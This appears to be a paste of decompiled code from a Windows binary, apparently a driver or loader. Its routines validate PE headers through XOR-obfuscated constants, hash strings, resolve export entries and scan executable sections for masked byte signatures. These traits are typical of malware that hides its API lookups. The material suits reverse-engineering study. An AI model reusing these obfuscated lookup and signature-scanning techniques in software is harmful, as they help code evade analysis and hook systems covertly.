- //----- (0001356E) --------------------------------------------------------
- int __usercall sub_1356E<eax>(unsigned int *a1<eax>, int a2<ebx>, int a3<edi>, int a4, int a5, int a6)
- {
- unsigned int v6; // eax@1
- int v7; // eax@2
- signed int v8; // eax@4
- int result; // eax@5
- int v10; // esi@6
- int v11; // eax@9
- v6 = *a1;
- if ( (signed int)v6 < 0 )
- {
- v7 = (unsigned __int16)v6;
- goto LABEL_9;
- }
- if ( !v6 || (v8 = sub_138BE(a4, v6), !v8) )
- return 4;
- v10 = v8 + 2;
- result = sub_13409(a2, a5, v8 + 2, a3);
- if ( result )
- return result;
- if ( !*(_DWORD *)a3 )
- {
- v7 = v10;
- LABEL_9:
- v11 = (*(int (__stdcall **)(int, int))(a2 + 25))(a6, v7);
- *(_DWORD *)a3 = v11;
- if ( v11 )
- return 0;
- return 4;
- }
- return 0;
- }
- //----- (0001369C) --------------------------------------------------------
- int __thiscall sub_1369C(void *this)
- {
- return (int)((char *)this - 4116659);
- }
- //----- (000136F8) --------------------------------------------------------
- signed int __cdecl sub_136F8(int a1, int a2, int a3)
- {
- int v4; // eax@3
- unsigned __int16 v5; // cx@4
- int v6; // edx@7
- int v7; // ecx@7
- __int16 v8; // dx@12
- if ( *(_WORD *)a2 != 23117 || (v4 = a2 + *(_DWORD *)(a2 + 60), (*(_DWORD *)v4 ^ 0xF750F284) != -145705004) )
- return 1;
- v5 = *(_WORD *)(v4 + 4);
- if ( 22531 == (v5 ^ 0x594F) )
- {
- if ( (*(_WORD *)(v4 + 24) ^ 0x5908) == 22531 && *(_WORD *)(v4 + 20) == 224 )
- {
- v7 = a1;
- *(_DWORD *)a1 = 0;
- v6 = v4 + 120;
- LABEL_12:
- *(_DWORD *)(v7 + 16) = v6;
- *(_DWORD *)(v7 + 26) = *(_DWORD *)(v4 + 80);
- *(_DWORD *)(v7 + 20) = *(_WORD *)(v4 + 20) + v4 + 24;
- v8 = *(_WORD *)(v4 + 6);
- *(_DWORD *)(v7 + 12) = v4;
- *(_DWORD *)(v7 + 4) = a3;
- *(_WORD *)(v7 + 24) = v8;
- *(_DWORD *)(v7 + 8) = a2;
- return 0;
- }
- }
- else
- {
- if ( 22531 == (v5 ^ 0xDE67) && (*(_WORD *)(v4 + 24) ^ 0x5A08) == 22531 && *(_WORD *)(v4 + 20) == 240 )
- {
- v7 = a1;
- *(_DWORD *)a1 = 1;
- v6 = v4 + 136;
- goto LABEL_12;
- }
- }
- return 1;
- }
- //----- (000138BE) --------------------------------------------------------
- signed int __cdecl sub_138BE(int a1, unsigned int a2)
- {
- signed int result; // eax@1
- result = sub_13B3A(a1, a2);
- if ( result )
- result = a2 + *(_DWORD *)(a1 + 8);
- return result;
- }
- //----- (000138DB) --------------------------------------------------------
- bool __cdecl sub_138DB(int a1, unsigned int a2, int a3, int a4)
- {
- int v4; // esi@1
- bool result; // eax@2
- unsigned int v6; // eax@3
- v4 = *(_DWORD *)(a1 + 16) + 8 * a2;
- if ( a2 >= 0x10 )
- return 1;
- v6 = *(_DWORD *)v4;
- if ( *(_DWORD *)v4 )
- {
- if ( v6 + *(_DWORD *)(v4 + 4) > *(_DWORD *)(a1 + 26) )
- return 1;
- *(_DWORD *)a3 = sub_138BE(a1, *(_DWORD *)v4);
- *(_DWORD *)a4 = *(_DWORD *)(v4 + 4);
- result = *(_DWORD *)a3 == 0;
- }
- else
- {
- LOBYTE(v6) = *(_DWORD *)(v4 + 4) == v6;
- result = v6 + 1;
- }
- return result;
- }
- //----- (0001392E) --------------------------------------------------------
- int __cdecl sub_1392E(int a1)
- {
- int result; // eax@1
- int v2; // edx@1
- char v3; // cl@1
- int v4; // esi@2
- v2 = a1;
- v3 = *(_BYTE *)a1;
- for ( result = 0; *(_BYTE *)v2; result = v4 )
- {
- v4 = result * (7 * result + 1) + v3 * (17 * v3 + 12);
- ++v2;
- v3 = *(_BYTE *)v2;
- }
- return result;
- }
- //----- (00013A4B) --------------------------------------------------------
- signed int __usercall sub_13A4B<eax>(unsigned int a1<eax>, int a2, int a3, unsigned __int16 a4)
- {
- signed int v4; // eax@1
- unsigned int v5; // esi@1
- unsigned int v6; // eax@3
- signed int result; // eax@4
- v5 = a1;
- v4 = sub_138BE(a2, *(_DWORD *)(a1 + 28));
- if ( !v4
- || (unsigned int)a4 >= *(_DWORD *)(v5 + 20)
- || (v6 = *(_DWORD *)(v4 + 4 * a4), !v6)
- || (result = sub_138BE(a2, v6), !result)
- || result >= v5 && result < a3 + v5 )
- result = 0;
- return result;
- }
- //----- (00013B3A) --------------------------------------------------------
- signed int __usercall sub_13B3A<eax>(int a1<eax>, unsigned int a2<ebx>)
- {
- int v2; // esi@1
- signed int result; // eax@2
- int v4; // edi@3
- int v5; // eax@6
- unsigned int v6; // ecx@6
- unsigned int v7; // eax@8
- int v8; // esi@12
- unsigned __int16 v9; // [sp+4h] [bp-4h]@1
- v2 = *(_DWORD *)(a1 + 20);
- v9 = *(_WORD *)(a1 + 24);
- if ( a2 < *(_DWORD *)(a1 + 26) )
- {
- v4 = 0;
- if ( !*(_DWORD *)(a1 + 4) )
- goto LABEL_17;
- if ( *(_WORD *)(a1 + 24) <= 0u )
- goto LABEL_14;
- while ( 1 )
- {
- v5 = v2 + 40 * (unsigned __int16)v4;
- v6 = *(_DWORD *)(v5 + 8);
- if ( v6 >= *(_DWORD *)(v5 + 16) )
- v6 = *(_DWORD *)(v5 + 16);
- v7 = *(_DWORD *)(v5 + 12);
- if ( a2 >= v7 )
- {
- if ( a2 < v6 + v7 )
- break;
- }
- ++v4;
- if ( (_WORD)v4 >= v9 )
- goto LABEL_14;
- }
- v8 = *(_DWORD *)(40 * (unsigned __int16)v4 + v2 + 36);
- if ( v8 & 0x2000000 || !(v8 & 0x40000000) )
- LABEL_14:
- result = 0;
- else
- LABEL_17:
- result = 1;
- }
- else
- {
- result = 0;
- }
- return result;
- }
- //----- (00013BF1) --------------------------------------------------------
- int __usercall sub_13BF1<eax>(unsigned int a1<eax>, int a2<ecx>, int a3, int a4, int a5)
- {
- int v5; // ecx@1
- int v6; // edi@1
- int v7; // esi@1
- int result; // eax@2
- int v9; // eax@4
- int v10; // ebx@4
- unsigned int v11; // [sp+Ch] [bp-4h]@1
- v6 = a2 + 4;
- v5 = a2 + a1 - 13;
- v7 = a1 - 4;
- v11 = v5;
- if ( a1 >= 0xD )
- {
- if ( v6 <= (unsigned int)v5 )
- {
- do
- {
- v9 = v7 + v6 - 4;
- v10 = v6;
- if ( v6 > (unsigned int)v9 )
- {
- LABEL_7:
- v10 = 0;
- }
- else
- {
- while ( *(_DWORD *)v10 != a3 )
- {
- ++v10;
- if ( v10 > (unsigned int)v9 )
- goto LABEL_7;
- }
- }
- if ( !v10 || v10 - 4 > v11 )
- break;
- if ( sub_13C66(a5, a4, v10 - 4, 0xDu) )
- return v10 - 4;
- v7 = v7 + v6 - v10 - 1;
- v6 = v10 + 1;
- }
- while ( v10 + 1 <= v11 );
- }
- result = 0;
- }
- else
- {
- result = 0;
- }
- return result;
- }
- //----- (00013C66) --------------------------------------------------------
- signed int __usercall sub_13C66<eax>(int a1<eax>, int a2<edx>, int a3<ecx>, unsigned int a4)
- {
- unsigned int v4; // edi@1
- int v5; // ecx@2
- int v6; // esi@2
- signed int result; // eax@5
- v4 = 0;
- if ( a4 )
- {
- v5 = a3 - a1;
- v6 = a2 - a1;
- while ( (*(_BYTE *)a1 & *(_BYTE *)(v5 + a1)) == *(_BYTE *)(v6 + a1) )
- {
- ++v4;
- ++a1;
- if ( v4 >= a4 )
- goto LABEL_5;
- }
- result = 0;
- }
- else
- {
- LABEL_5:
- result = 1;
- }
- return result;
- }
- //----- (00013C92) --------------------------------------------------------
- int __cdecl sub_13C92(int a1, char a2, int a3)
- {
- int v3; // eax@2
- int v5; // [sp+0h] [bp-4h]@1
- v5 = a1;
- while ( 1 )
- {
- v3 = a3--;
- if ( !v3 )
- break;
- *(_BYTE *)a1++ = a2;
- }
- return v5;
- }
- //----- (00013CC0) --------------------------------------------------------
- int __usercall sub_13CC0<eax>(int a1<eax>, int a2<edx>)
- {
- int v2; // esi@1
- int v3; // eax@2
- int v4; // ecx@4
- v2 = a1;
- do
- {
- v3 = *(_BYTE *)v2++;
- if ( (unsigned int)(v3 - 65) <= 0x19 )
- v3 += 32;
- v4 = *(_BYTE *)a2++;
- if ( (unsigned int)(v4 - 65) <= 0x19 )
- v4 += 32;
- }
- while ( v3 && v3 == v4 );
- return v3 - v4;
- }
- //----- (00013D8E) --------------------------------------------------------
- signed int __usercall sub_13D8E<eax>(int a1<eax>, int a2, int a3, unsigned int a4, int (__cdecl *a5)(_DWORD, _DWORD, _DWORD))
- {
- unsigned int v5; // ebx@1
- int v6; // esi@2
- int v7; // eax@5
- signed int result; // eax@9
- v5 = 0;
- if ( a4 )
- {
- v6 = a1 + 8;
- while ( 1 )
- {
- if ( (*(_DWORD *)(v6 + 28) & 0x60000020) == 1610612768 )
- {
- if ( !(*(_DWORD *)(v6 + 28) & 0x2000000) )
- {
- v7 = *(_DWORD *)v6;
- if ( *(_DWORD *)v6 >= *(_DWORD *)(v6 + 8) )
- v7 = *(_DWORD *)(v6 + 8);
- if ( a5(*(_DWORD *)(a2 + 33) + *(_DWORD *)(v6 + 4), v7, a3) )
- break;
- }
- }
- ++v5;
- v6 += 40;
- if ( v5 >= a4 )
- goto LABEL_9;
- }
- result = 1;
- }
- else
- {
- LABEL_9:
- result = 0;
- }
- return result;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement